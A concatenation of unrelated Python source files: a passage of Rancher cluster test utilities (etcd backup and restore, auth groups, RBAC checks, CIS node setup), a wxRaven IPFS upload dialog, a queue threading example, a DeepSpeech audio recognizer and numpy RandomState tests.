validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": "80"}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
        assert_message = "The backup shouldn't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
assert filename not in response, \
"The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
count = 0
for user, group in nested_group["group_dic"].items():
if len(group) == 0:
count += 1
if count < len(nested_group["group_dic"]):
return True
return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
if len(nested_group["group_dic"].get(g).get("users")) > 0:
return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
and return the user token"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
:param skip: if True skip the first char of the received message
"""
        while socket.connected:
try:
data = socket.recv()
# the message from the kubectl contains an extra char
if skip:
data = data[1:]
if len(data) < 5:
pass
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
    create a websocket connection and check if it is connected
:param url: the url to connect to
:param subprotocols: the list of subprotocols
:return:
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
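# Hedged usage sketch combining create_connection() and WebsocketLogParse
# (the URL and subprotocol below are placeholders, not real endpoints):
#   ws = create_connection("wss://<rancher-server>/...", ["base64.binary.k8s.io"])
#   logparse = WebsocketLogParse()
#   WebsocketLogParse.start_thread(target=logparse.receiver, args=(ws, False))
#   # ...after some activity, inspect logparse.last_message...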
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-multinode-nlb',
resource_prefix + '-k3s-nlb',
resource_prefix + '-internal-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-multinode-db"
print("deleting the database (if it exists): {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
route53_names = [resource_prefix + ".qa.rancher.space.",
resource_prefix + "-internal.qa.rancher.space."]
for name in route53_names:
print("deleting the route53 record (if it exists): {}".format(name))
AmazonWebServices().delete_route_53_record(name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
i = 0
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo useradd etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
aws_node.execute_command("sudo sysctl -w "
"kernel.keys.root_maxbytes=25000000")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
cluster = validate_cluster_state(client, cluster)
    # wait for the workloads under the System project to get active
time.sleep(20)
if profile == 'rke-cis-1.5':
create_kubeconfig(cluster)
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
account_update_file = DATA_SUBDIR + "/account_update.yaml"
items = execute_kubectl_cmd("get namespaces -A")["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns))
namespace = ["default", "kube-system"]
for ns in namespace:
execute_kubectl_cmd('patch serviceaccount default'
' -n {0} -p "$(cat {1})"'.
format(ns, account_update_file))
return cluster
def get_node_details(cluster, client):
"""
lists the nodes from the cluster. This cluster has only 1 node.
:return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
def create_service_account_configfile():
client, cluster = get_user_client_and_cluster()
create_kubeconfig(cluster)
name = random_name()
# create a service account
execute_kubectl_cmd(cmd="create sa {}".format(name), json_out=False)
# get the ca and token
res = execute_kubectl_cmd(cmd="get secret -o name", json_out=False)
secret_name = ""
for item in res.split("\n"):
if name in item:
secret_name = item.split("/")[1]
break
res = execute_kubectl_cmd(cmd="get secret {}".format(secret_name))
ca = res["data"]["ca.crt"]
token = res["data"]["token"]
token = base64.b64decode(token).decode()
server = None
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.controlPlane:
server = "https://" + node.externalIpAddress + ":6443"
break
assert server is not None, 'failed to get the public ip of control plane'
config = """
apiVersion: v1
kind: Config
clusters:
- name: test-cluster
cluster:
server: {server}
certificate-authority-data: {ca}
contexts:
- name: default-context
context:
cluster: test-cluster
namespace: default
user: test-user
current-context: default-context
users:
- name: test-user
user:
token: {token}
"""
config = config.format(server=server, ca=ca, token=token)
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
with open(config_file, "w") as file:
file.write(config)
return name
def rbac_test_file_reader(file_path=None):
"""
    This method generates test cases from an input file and returns the result
    that can be used to parametrize pytest cases
:param file_path: the path to the JSON file for test cases
:return: a list of tuples of
(cluster_role, command, authorization, service account name)
"""
if test_rbac_v2 == "False":
return []
if file_path is None:
pytest.fail("no file is provided")
with open(file_path) as reader:
test_cases = json.loads(reader.read().replace("{resource_root}",
DATA_SUBDIR))
output = []
for cluster_role, checks in test_cases.items():
# create a service account for each role
name = create_service_account_configfile()
# create the cluster role binding
cmd = "create clusterrolebinding {} " \
"--clusterrole {} " \
"--serviceaccount {}".format(name, cluster_role,
"default:" + name)
execute_kubectl_cmd(cmd, json_out=False)
for command in checks["should_pass"]:
output.append((cluster_role, command, True, name))
for command in checks["should_fail"]:
output.append((cluster_role, command, False, name))
return output
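# Hedged sketch of the JSON test-case file consumed above; the structure is
# inferred from the parsing loop, and the role and commands are illustrative:
#   {
#     "cluster-admin": {"should_pass": ["get pods -A"], "should_fail": []},
#     "view": {"should_pass": ["get pods"], "should_fail": ["delete pods --all"]}
#   }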
def validate_cluster_role_rbac(cluster_role, command, authorization, name):
"""
    This method runs the given kubectl command with the service account's
    kubeconfig and validates that the permission granted (or denied) by the
    cluster role binding matches the expectation
:param cluster_role: the cluster role
:param command: the kubectl command to run
:param authorization: if the service account has the permission: True/False
:param name: the name of the service account, cluster role binding, and the
kubeconfig file
"""
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
result = execute_kubectl_cmd(command,
json_out=False,
kubeconfig=config_file,
stderr=True).decode('utf_8')
if authorization:
assert "Error from server (Forbidden)" not in result, \
"{} should have the authorization to run {}".format(cluster_role,
command)
else:
assert "Error from server (Forbidden)" in result, \
"{} should NOT have the authorization to run {}".format(
cluster_role, command)
|
wxRavenIPFSUploaderLogic.py
|
'''
Created on 5 Jan. 2022
@author: slinux
'''
from .wxRavenIPFSDesign import wxRavenIPFSFileUploaderDialog
import threading
import time
import wx
from wxRavenGUI.application.wxcustom.CustomLoading import *
class wxRavenIPFSFileUploader(wxRavenIPFSFileUploaderDialog):
'''
classdocs
'''
view_base_name = "IPFS File Uploader"
view_name = "IPFS File Uploader"
parent_frame = None
default_position = "dialog"
icon = 'ipfs_add'#wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self,parent, parentFrame, position = "dialog", viewName= "IPFS File Uploader", isInternalPluginView=False):
'''
Constructor
'''
super().__init__(parent=parent)
#
# Your constructor here
#
self.view_base_name = "IPFS File Uploader"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._fileSent = False
self._waitingAnswer = False
self._filename = ""
self._loadingPanel = None
        #This is to add the view in the appropriate place, using the main app to do so
        #
        #The only exception is when the panel itself is called by the plugin or another view
        #In this case the position in the main app must not be managed (see the rpc command panel as an example)
#
#if not isInternalPluginView:
# parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#
# Dialog modification
#
#
        # If your app needs to load a bunch of data, it may want to wait until the app is ready,
        # especially at startup + resume of plugins.
        # Use this thread method + callback to manage the 1sec/2sec init delay
#
#
self.waitApplicationReady()
def waitApplicationReady(self):
t=threading.Thread(target=self.__waitLoop_T__, args=(self.UpdateView,))
t.start()
def __waitLoop_T__(self,callback):
while not self.parent_frame._isReady:
time.sleep(1)
wx.CallAfter(callback, ())
    #Override the UpdateView method to define what happens when the plugin calls UpdateViews()
def UpdateView(self, evt=None):
self.UpdateDataFromPluginDatas()
self.Layout()
def OnSendButton(self, evt):
fts = self.m_filePicker1.GetPath()
self._filename = fts
print(f"file to send : {fts}")
_p = self.parent_frame.GetPlugin("IPFS")
_p.__setHashResult__(fts, -1)
_p.UploadFileToIPFS_RPC(fts)
self._fileSent = True
self._waitingAnswer = True
self.m_SendButton.Enable(False)
self.ShowLoading()
t=threading.Thread(target=self.__waitHashResultLoop_T__)
t.start()
def __waitHashResultLoop_T__(self, evt=None):
_p = self.parent_frame.GetPlugin("IPFS")
fts = self.m_filePicker1.GetPath()
_hashResult = -1
while _hashResult == -1:
time.sleep(1)
_hashResult = _p.__getHashResult__(fts)
wx.CallAfter(self.UpdateDataFromPluginDatas, ())
def ShowLoading(self):
        if self._loadingPanel is None:
self._loadingPanel = wxBackgroundWorkerAnimation(self)
self._loadingPanel.Show(show=True)
self.Layout()
def HideLoading(self):
        if self._loadingPanel is not None:
self._loadingPanel.Hide()
self.Layout()
    #Example to show how plugin data are retrieved
def UpdateDataFromPluginDatas(self, evt=None):
self.HideLoading()
if self._filename == "":
self.m_SendButton.Enable(True)
return
print(f"UpdateDataFromPluginDatas IPFS {self._filename}")
try:
print("Hash received !")
if self._filename != "":
myPluginData = self.parent_frame.GetPluginData("IPFS","_uploadedFiles")
                if self._filename in myPluginData:
self.m_hashResult.SetValue(myPluginData[self._filename])
self.m_bitmap2.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('passed'))
else:
self.m_bitmap2.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('error_tsk'))
#
#myPluginSetting = self.parent_frame.GetPluginSetting("Tutorial","booleansetting")#SavePanelSettings GetPluginSetting
#
#Update your panel
#
pass
#textToPrint = " booleansetting = " + str(myPluginSetting)
#textToPrint = textToPrint + "\n\n myPluginData2 = " + str(myPluginData)
#self.m_staticText2.SetLabel(str(textToPrint))
except Exception as e:
            self.parent_frame.Log("Unable to load ipfs upload data", type="warning")
self.m_bitmap2.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('error_tsk'))
self.m_SendButton.Enable(True)
|
comb_queue_thread.py
|
import queue
import threading
import time
def func(q, thread_no):
while True:
task = q.get()
time.sleep(2)
q.task_done()
print(f'Thread #{thread_no} is doing task #{task} in the queue.')
q = queue.Queue()
for i in range(4):
worker = threading.Thread(target=func, args=(q, i,), daemon=True)
worker.start()
for j in range(10):
q.put(j)
q.join()
|
__init__.py
|
# -*- coding: UTF-8 -*-
from __future__ import absolute_import
# Operates on sound fragments consisting of signed integer samples 8, 16
# or 32 bits wide, stored in Python strings.
import audioop
from contextlib import contextmanager
from ctypes import CFUNCTYPE, c_char_p, c_int, cdll
from threading import Thread
import pyaudio # Provides Python bindings for PortAudio, the cross platform audio API
from embedded_ava import EmbeddedVA
from embedded_ava.sr.deepspeech.config import ConfigDeepSpeech
from embedded_ava.sr.deepspeech.server import SpeechServerMain
import numpy as np
CHUNK = 8000 # Smallest unit of audio read per iteration (frames per buffer)
FORMAT = pyaudio.paInt16 # Data format
CHANNELS = 1 # Number of channels
RATE = 16000 # Bit Rate of audio stream / Frame Rate
THRESHOLD = 1000 # Threshold RMS value for detecting a sound stimulus
SILENCE_DETECTION = 1 # Number of consecutive quiet chunks before the audio is considered silent
LISTENING = False
class DeepSpeechRecognizer():
def __init__(self):
# logging.basicConfig(level=logging.INFO)
self.__class__.finished = False
@classmethod
    def set_finished(cls, finished):
        cls.finished = True
def reset(self):
self.__class__.finished = False
def recognize(self, her):
with noalsaerr():
p = pyaudio.PyAudio() # Create a PyAudio session
# Create a stream
stream = p.open(
format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
output=True,
frames_per_buffer=CHUNK)
try:
data = stream.read(
CHUNK) # Get first data frame from the microphone
# Loop over the frames of the audio / data chunks
audio = None
# print("START LISTENNING")
                while data != b'':
rms = audioop.rms(
data, 2) # Calculate Root Mean Square of current chunk
if rms >= THRESHOLD: # If Root Mean Square value is greater than THRESHOLD constant
audio = data
silence_counter = 0 # Define silence counter
# While silence counter value less than SILENCE_DETECTION constant
while silence_counter < SILENCE_DETECTION:
data = stream.read(
CHUNK) # Read a new chunk from the stream
if LISTENING:
stream.write(data, CHUNK)
audio = audio + data
rms = audioop.rms(
data, 2
) # Calculate Root Mean Square of current chunk again
if rms < THRESHOLD: # If Root Mean Square value is less than THRESHOLD constant
silence_counter += 1 # Then increase silence counter
else: # Else
silence_counter = 0 # Assign zero value to silence counter
# print("Analyzing...")
stream.stop_stream()
                        audio = np.frombuffer(audio, dtype=np.int16)  # Convert raw bytes to int16 samples (np.fromstring is deprecated for binary data)
com = SpeechServerMain.ds.stt(audio, RATE)
stream.start_stream()
# print(com)
t = Thread(target=her.command, args=(com,))
t.start()
self.reset()
data = stream.read(CHUNK) # Read a new chunk from the stream
if LISTENING:
stream.write(data, CHUNK)
except KeyboardInterrupt:
stream.stop_stream()
stream.close()
p.terminate()
# self.loop.quit()
raise KeyboardInterrupt
ERROR_HANDLER_FUNC = CFUNCTYPE(None, c_char_p, c_int, c_char_p, c_int,
c_char_p)
def py_error_handler(filename, line, function, err, fmt):
pass
c_error_handler = ERROR_HANDLER_FUNC(py_error_handler)
@contextmanager
def noalsaerr():
asound = cdll.LoadLibrary('libasound.so')
asound.snd_lib_error_set_handler(c_error_handler)
yield
asound.snd_lib_error_set_handler(None)
if __name__ == '__main__':
recognizer = DeepSpeechRecognizer()
recognizer.recognize([])
|
test_randomstate.py
|
import hashlib
import pickle
import sys
import warnings
import numpy as np
import pytest
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy.random import MT19937, PCG64
from numpy import random
INT_FUNCS = {'binomial': (100.0, 0.6),
'geometric': (.5,),
'hypergeometric': (20, 20, 10),
'logseries': (.5,),
'multinomial': (20, np.ones(6) / 6.0),
'negative_binomial': (100, .5),
'poisson': (10.0,),
'zipf': (2,),
}
if np.iinfo(int).max < 2**32:
# Windows and some 32-bit platforms, e.g., ARM
INT_FUNC_HASHES = {'binomial': '2fbead005fc63942decb5326d36a1f32fe2c9d32c904ee61e46866b88447c263',
'logseries': '23ead5dcde35d4cfd4ef2c105e4c3d43304b45dc1b1444b7823b9ee4fa144ebb',
'geometric': '0d764db64f5c3bad48c8c33551c13b4d07a1e7b470f77629bef6c985cac76fcf',
'hypergeometric': '7b59bf2f1691626c5815cdcd9a49e1dd68697251d4521575219e4d2a1b8b2c67',
'multinomial': 'd754fa5b92943a38ec07630de92362dd2e02c43577fc147417dc5b9db94ccdd3',
'negative_binomial': '8eb216f7cb2a63cf55605422845caaff002fddc64a7dc8b2d45acd477a49e824',
'poisson': '70c891d76104013ebd6f6bcf30d403a9074b886ff62e4e6b8eb605bf1a4673b7',
'zipf': '01f074f97517cd5d21747148ac6ca4074dde7fcb7acbaec0a936606fecacd93f',
}
else:
INT_FUNC_HASHES = {'binomial': '8626dd9d052cb608e93d8868de0a7b347258b199493871a1dc56e2a26cacb112',
'geometric': '8edd53d272e49c4fc8fbbe6c7d08d563d62e482921f3131d0a0e068af30f0db9',
'hypergeometric': '83496cc4281c77b786c9b7ad88b74d42e01603a55c60577ebab81c3ba8d45657',
'logseries': '65878a38747c176bc00e930ebafebb69d4e1e16cd3a704e264ea8f5e24f548db',
'multinomial': '7a984ae6dca26fd25374479e118b22f55db0aedccd5a0f2584ceada33db98605',
'negative_binomial': 'd636d968e6a24ae92ab52fe11c46ac45b0897e98714426764e820a7d77602a61',
'poisson': '956552176f77e7c9cb20d0118fc9cf690be488d790ed4b4c4747b965e61b0bb4',
'zipf': 'f84ba7feffda41e606e20b28dfc0f1ea9964a74574513d4a4cbc98433a8bfa45',
}
@pytest.fixture(scope='module', params=INT_FUNCS)
def int_func(request):
return (request.param, INT_FUNCS[request.param],
INT_FUNC_HASHES[request.param])
def assert_mt19937_state_equal(a, b):
assert_equal(a['bit_generator'], b['bit_generator'])
assert_array_equal(a['state']['key'], b['state']['key'])
assert_array_equal(a['state']['pos'], b['state']['pos'])
assert_equal(a['has_gauss'], b['has_gauss'])
assert_equal(a['gauss'], b['gauss'])
class TestSeed:
def test_scalar(self):
s = random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, -0.5)
assert_raises(ValueError, random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, [-0.5])
assert_raises(ValueError, random.RandomState, [-1])
assert_raises(ValueError, random.RandomState, [4294967296])
assert_raises(ValueError, random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, random.RandomState, np.array([],
dtype=np.int64))
assert_raises(ValueError, random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, random.RandomState, [[1, 2, 3],
[4, 5, 6]])
def test_cannot_seed(self):
rs = random.RandomState(PCG64(0))
with assert_raises(TypeError):
rs.seed(1234)
def test_invalid_initialization(self):
assert_raises(ValueError, random.RandomState, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
